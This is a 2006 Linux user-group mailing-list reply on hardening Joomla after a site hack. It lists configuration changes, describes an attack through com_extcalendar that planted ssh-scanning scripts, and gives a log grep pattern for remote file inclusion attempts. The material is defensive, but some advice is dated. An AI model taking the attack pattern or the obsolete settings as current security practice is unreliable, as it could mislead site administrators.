They made some hard core changes in the most recent security update.
http://www.joomla.org/content/view/1843/74/
In previous updates you just untarred the patch over your installation
and were done this one requires a bit more.
In the most recent update some things weren't completely obvious like
overwriting your .htaccess file with the htaccess.txt file they provided,
setting safe mode and magic quotes on, register globals off.
The htaccess.txt file they included takes care of the malformed URL's
that are typically used to hack joomla extensions and php scripts in
general.
If the web server has mod rewrite I'd recommend turning on the search
engine friendly links too.
Any joomla extensions that don't work with register globals off should
be replaced anyway.
The most recent update (1.0.11) required a few changes:
* Set Register Globals off
* Set Magic Quotes on
* Change the .htaccess to match the htaccess.txt file.
* edit globals.txt and change RG_EMULATION to 0: define(
'RG_EMULATION', 0 );
If your host has register globals on you can change it by adding this to
the top of the .htaccess file:
|php_flag register_globals 0|
Add this if magic quotes are off:
|php_flag magic_quotes_gpc on
If you're not sure, create a php file in the web root and look at the
php output:
<? phpinfo(); ?>|
In some cases I've had to download the full install and overwrite all of
the Joomla files to eliminate issues with upgrading.
For older Mambo sites you have to update the database too.
One of my joomla sites was hacked a few months ago.. they used
com_extcalendar and malformed URL's that use php to overwrite the
configuration files.
In my case they created a bunch of shell scripts in my /tmp directory
and used php to launch them to do ssh scanning.
If you grep your apache access log for 'mosConfig_absolute_path=http'
you'll likely find the hack attempts.
JD
Technomage wrote:
> need some help with security (firewall, etc?)?
>
> I am working on a machine in california right now that has similar programs
> running. got sdome firewall ideas that might do the trick.
>
> let me know.
>
> TMH
>
> On Tuesday 05 September 2006 07:37, Alan Dayley wrote:
>
>> The PLUG website is down. It was hacked sometime early this morning.
>> (Joomla! and or it's addons is proving to be quite insecure.)
>>
>> I don't have time to do much with it right now. It'll have to wait till
>> tonight. Sorry about that. Please be as patient as possible.
>>
>> Alan
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change you mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change you mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
--
JD Austin
Twin Geckos Technology Services LLC
email:
jd@twingeckos.com
http://www.twingeckos.com
phone/fax: 480.288.8195
---------------------------------------------------
PLUG-discuss mailing list -
PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change you mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
(text/plain)